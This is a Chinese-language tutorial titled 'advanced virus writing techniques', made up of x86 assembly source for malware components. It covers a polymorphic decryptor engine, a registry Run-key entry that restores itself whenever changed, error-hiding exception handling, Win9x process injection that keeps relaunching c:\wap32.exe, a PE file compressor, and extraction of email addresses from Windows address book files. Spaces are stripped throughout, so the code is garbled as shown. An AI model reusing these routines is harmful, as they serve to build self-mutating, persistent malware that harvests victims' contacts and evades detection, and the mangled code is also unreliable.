文章作者:whg
病毒的高级编写技巧
Author:whg
Email:whg@whitecell.org
Homepage:http://www.whitecell.org
1、超级病毒变形引擎
此段代码会在DATA段内生成一个解密代码。
.586p
.modelflat,STDCALL
extrnExitProcess:proc
VirusSize=100h
.data
DecodeMethoddd?
DeCode:
pushad
callEncode
db100hdup(11h)
Encode:
db100hdup(0cch)
RndReg0dd0eax
RndReg1dd0ebx
RndCodedd0RndCode
RndMimadd60932561RndPassword
.code
@@Start:
moveax,RndMima
roreax,7
movRndCode,eax
moveax,RndCode
movecx,eax
andeax,011b
movRndReg0,eax
xorecx,RndMima
andecx,011b
cmpeax,ecx
jnzshortChooseRegOk
incecx
andecx,011b
ChooseRegOk:
movRndReg1,ecx
movedi,offsetEncode
rorRndCode,1
callGetBxCode,0,RndReg0,RndCode
movesi,eax
ContFillStep0:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep0
decedi
rorRndCode,1
callGetBxCode,1,RndReg1,RndCode
movesi,eax
ContFillStep1:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep1
decedi
movebx,edi//计算机Jmp指令用
rorRndCode,1
callGetBxCode,2,RndReg0,RndCode
movesi,eax
ContFillStep2:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep2
decedi
moveax,RndMima
mov[edi-4],eax//填写随机密码
moveax,RndCode
andeax,01
movDecodeMethod,eax//填写DeCode方法
rorRndCode,1
callGetBxCode,3,RndReg0,RndCode
movesi,eax
ContFillStep3:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep3
decedi
rorRndCode,1
callGetBxCode,4,RndReg1,RndCode
movesi,eax
ContFillStep4:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep4
decedi
rorRndCode,1
callGetBxCode,5,RndReg0,RndCode
movesi,eax
ContFillStep5:
cld
lodsb
stosb
cmpal,0cch
jnzContFillStep5
decedi
moval,0c3h
mov[edi],al//填写Ret指令
subebx,edi
mov[edi-1],bl//填写jmp指令
int3;
jmpDeCode
ret
GetBxCodeprocusesebxecxedxesiedi,Step:dword,Reg:dword,Rnd:dword
callGetBxCodeAddr
Step0_Eax:
moveax,[esp]
int3;
popeax
pusheax
int3;
Step0_Ebx:
popebx
pushebx
int3;
pushdwordptr[esp]
popebx
int3;
Step0_Ecx:
movecx,[esp]
int3;
popecx
pushecx
int3;
Step0_Edx:
movedx,[esp]
int3;
movedx,esp
movedx,[edx]
int3
Step1_Eax:
moveax,VirusSize
int3
subeax,eax
addax,VirusSize+3081h
subax,3081h
int3
Step1_Ebx:
movebx,VirusSize
int3;
xorebx,ebx
orbx,VirusSize
int3;
Step1_Ecx:
subecx,ecx
xorecx,(VirusSizexor3181h)
xorecx,(3181h)
int3;
movecx,0
andcx,VirusSize
int3
Step1_Edx:
andedx,0
xordx,(VirusSize-0281h)
adddx,0281h
int3;
xoredx,edx
subedx,(0181h-VirusSize)
subedx,-0181h
int3;
Setp2_Eax:
xor[eax],12345678h
int3
add[eax],12345678h
int3
Setp2_Ebx:
xor[ebx],12345678h
int3;
add[ebx],12345678h
int3;
Setp2_Ecx:
xor[ecx],12345678h
int3;
add[ecx],12345678h
int3;
Setp2_Edx:
xor[edx],12345678h
int3;
add[edx],12345678h
int3;
Step3_Eax:
addeax,4
int3
inceax
inceax
inceax
inceax
int3;
Step3_Ebx:
addebx,5
decebx
int3
addebx,2
addebx,2
int3;
Step3_Ecx:
subecx,-4
int3
subecx,-5
dececx
int3;
Step3_Edx:
incedx
subedx,-3
int3
addedx,04
int3;
Step4_Eax:
subeax,4
int3
deceax
deceax
deceax
subeax,1
int3;
Step4_Ebx:
decebx
subebx,3
int3;
decebx
decebx
subebx,2
int3;
Step4_Ecx:
addcx,123
subcx,123+4
int3
subcx,-4
deccx
subcx,7
int3
Step4_Edx:
subdx,2
decdx
subdx,1
int3
incedx
subdx,5
int3;
Step5_Eax:
jnz$
int3
ja$
int3
Step5_Ebx:
jg$
int3
jnb$
int3
Step5_Ecx:
jnl$
int3
jnz$
int3
Step5_Edx:
ja$
int3
jg$
int3
GetBxCodeAddr:
popesi
moval,0cch//指令分割符
movecx,Step
shlecx,1
shlecx,1
addecx,Reg//计算机得到的指令位置
shlecx,1
andRnd,01b
addecx,Rnd
jcxzshortGetBxCodeOver
ContFindCode:
pushecx
ContFindCC:
incesi
cmp[esi],al
jnzContFindCC
popecx
loopContFindCode
moveax,esi
inceax
ret
GetBxCodeOver:
moveax,esi
ret
GetBxCodeendp
end@@Start
2、Windows9x/2000/xp琐定注册表
.586p
.modelflat,STDCALL
.data
HKeyStrdb$1$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$1$,0
ValueNamedb$1$wap32$1$,0
PathNamedb$1$wap32.exe$1$,0
.code
extrnRegOpenKeyA:proc
extrnRegSetValueExA:proc
extrnRegCloseKey:proc
extrnExitProcess:proc
extrnRegNotifyChangeKeyValue:proc
extrnCreateThread:proc
extrnSleep:proc
extrnRegQueryValueExA:proc
start:
pusheax
callRegOpenKeyA,080000002h,offsetHKeyStr,esp
popebx
callRegSetValueExA,ebx,offsetValueName,0,01,offsetPathName,100h
subesp,100h
moveax,esp
push100h
callRegQueryValueExA,ebx,offsetValueName,0,0,eax,esp
popeax
addesp,100h
pusheax
callCreateThread,0,0,offsetRegProtectProc,ebx,0,esp
popeax
callSleep,1000*60*3
ret
RegProtectProcprochKey:dword
movebx,hKey
subesp,100h
movedi,esp
callGetProtectKeyName
db$1$wap32$1$,0
GetProtectKeyName:
popesi
push100h
callRegQueryValueExA,ebx,esi,0,0,edi,esp
popeax
WaitRegChangeNotify:
callRegNotifyChangeKeyValue,ebx,0,4,0,0
callRegSetValueExA,ebx,esi,0,01,edi,100h
jmpshortWaitRegChangeNotify
RegProtectProcendp
endstart
3、Windows9x/2000意外处理通用程序
此段程序可以达到屏蔽程序错误的效果
includewap32.inc
.386p
.modelflat,stdcall
extrnMessageBoxA:proc
extrnExitProcess:proc
.data
Msgdb$1$Fuck$1$,0
SetSehFrame:ecx=忽略错误继续执行地址
popeax弹出返回地址
pushecx保存忽略错误继续执行地址
callPushExceptionProc
jmpshortException
PushExceptionProc:
pushfs:dwordptr[0]
movfs:[0],esp
callGetEspAddr
pushD[edx]保存原Esp地址值
mov[edx],esp
jmpeax
ClearSehFrame:
popeax弹出返回地址
callGetEspAddr
movesp,[edx]
popD[edx]恢复原Esp地址值
popfs:dwordptr[0]
popecx
popecx弹出忽略错误继续执行地址
jmpeax
ExceptionprocpRecord,pFrame,pContext,pDispatch
callPushSehBackProc
callClearSehFrame
jmpecx
PushSehBackProc:
popecx
moveax,pContext
mov[eax.cx_Eip],ecx
xoreax,eax忽略错误继续执行
ret
Exceptionendp
GetEspAddr:
callPushOffsetEspAddr
dd?
PushOffsetEspAddr:
popedx
ret
.code
Start:
callPushErrorProc
callMessageBoxA,0,offsetMsg,offsetMsg,0
ret
PushErrorProc:
popecx
callSetSehFrame
movds:[0],eax
callClearSehFrame
ret
endStart
4、Windows9x下进程不死术
此段程序首先实现Win9x下注射远程线程(新技术)
然后与Win2k下进程不死术一样了。
includeWin32.inc
.386p
.modelflat,stdcall
extrnGetProcAddress:proc
extrnWinExec:proc
extrnMessageBoxA:proc
extrnSleep:proc
extrnGetCurrentProcessId:proc
extrnOpenProcess:proc
extrnGetCurrentProcess:proc
extrnWriteProcessMemory:proc
extrnGetExitCodeProcess:proc
.data
;问题,要Sleep()这样做使Kernel32有机会更新数据
KnlThreadprocProcID:dword
callGetKnlOpenProcess
KnlOpenProcessdd?
GetKnlOpenProcess:
popeax
call[eax],PROCESS_ALL_ACCESS,FALSE,ProcID
oreax,eax
jzshortExitProtectProc
movebx,eax
callGetKnlWaitForSingleObject
KnlWaitForSingleObjectdd?
GetKnlWaitForSingleObject:
popeax
call[eax],ebx,-1h
callGetFileNameAddress
GetFileNameAddress:
popecx
addecx,offsetFileName-offsetGetFileNameAddress
callGetKnlWinExec
KnlWinExecdd?
GetKnlWinExec:
popeax
call[eax],ecx,01
ExitProtectProc:
ret
KnlThreadendp
FileNamedb$1$c:\wap32.exe$1$,0
KnlOpenProcessStrdb$1$OpenProcess$1$,0
KnlWaitForObjectStrdb$1$WaitForSingleObject$1$,0
KnlWinExecStrdb$1$WinExec$1$,0
KnlSleepStrdb$1$Sleep$1$,0
KnlCreateKnlThreadStrdb$1$CreateKernelThread$1$,0
.code
Start:
callGetProcAddress,0bff70000h,offsetKnlOpenProcessStr
movKnlOpenProcess,eax
callGetProcAddress,0bff70000h,offsetKnlWaitForObjectStr
movKnlWaitForSingleObject,eax
callGetProcAddress,0bff70000h,offsetKnlWinExecStr
movKnlWinExec,eax
callMoveDataToKnl,offsetStart,0bff70600h,100h
callGetProcAddress,0bff70000h,offsetKnlCreateKnlThreadStr
movebx,eax
callGetCurrentProcessId
pusheax
callebx,0,0,0bff70000h+600h,eax,0,esp
popeax
callMessageBoxA,0,offsetFileName,offsetFileName,0
ret
MoveDataToKnlprocusesebxesiedi,Src:dword,Des:dword,nCx:dword
pusheax
sidt[esp-2]
popeax
addeax,3*8
movebx,[eax]
movedx,[eax+4]
callSetIdt03
pushad
mov[eax],ebx
mov[eax+4],edx
cld
repmovsb
popad
iret
SetIdt03:
cli
popW[eax]
popW[eax+6]
movesi,Src
movedi,Des
movecx,nCx
int3;
sti
ret
MoveDataToKnlendp
endStart
5、简单算法,高效率压缩PE文件
.586p
.modelflat,STDCALL
.data
OldFiledb$1$pe.exe$1$,0
NewFiledb$1$pe.zzz$1$,0
FileDatadb0,0
.code
extrn_lopen:proc,_lcreat:proc
extrn_lread:proc,_lwrite:proc
extrn_lclose:proc
extrnExitProcess:proc
start:
call_lopen,offsetOldFile,0
cmpeax,-1
jzExitProc
movesi,eax
call_lcreat,offsetNewFile,0
cmpeax,-1
jzCloseOldFile
movedi,eax
xorebx,ebx
ReadData:
call_lread,esi,offsetFileData,1
oreax,eax
jzshortReadOver
movzxeax,FileData
oreax,eax
jnzshortNoZero
incebx
cmpebx,0ffh
jnzshortReadData
xoreax,eax
movah,bl
xchgax,wordptrFileData
call_lwrite,edi,offsetFileData,2
xorebx,ebx
jmpshortReadData
NoZero:
orebx,ebx
jnzshortNoZeroData
call_lwrite,edi,offsetFileData,1
jmpshortReadData
NoZeroData:
pusheax
xoreax,eax
movah,bl
movwordptrFileData,ax
call_lwrite,edi,offsetFileData,2
xorebx,ebx
popeax
movFileData,al
call_lwrite,edi,offsetFileData,1
jmpReadData
ReadOver:
orebx,ebx
jzshortCloseFile
xoreax,eax
movah,bl
xchgax,wordptrFileData
call_lwrite,edi,offsetFileData,2
xorebx,ebx
CloseFile:
call_lclose,edi
CloseOldFile:
call_lclose,esi
ExitProc:
callExitProcess,0
endstart
6、提取Windows地址薄文件(*.WAB)的Email信息
.586p
.modelflat,STDCALL
.data
MailFiledb$1$My.WAB$1$,0
.code
extrn_lopen:proc,_lcreat:proc
extrn_lread:proc,_lwrite:proc
extrn_llseek:proc
extrn_lclose:proc
extrnMessageBoxA:proc
extrnExitProcess:proc
extrnWideCharToMultiByte:proc
start:
call_lopen,offsetMailFile,0
cmpeax,-1
jzshortExitProc
movebx,eax
subesp,100h
movedi,esp
call_lread,ebx,edi,100h
cmpeax,100h
jnzshortCloseFile
moveax,[edi+60h]得到Unicode邮件名偏移
call_llseek,ebx,eax,0
movecx,[edi+64h]得到Unicode邮件名个数
ContWabMail:
pushecx
call_lread,ebx,edi,44h读一个记录
cmpeax,44
subesp,100h
moveax,esp
callWideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
moveax,esp
callMessageBoxA,0,eax,eax,0
addesp,100h
popecx
loopshortContWabMail
CloseFile:
call_lclose,ebx
ExitProc:
callExitProcess,0
endstart
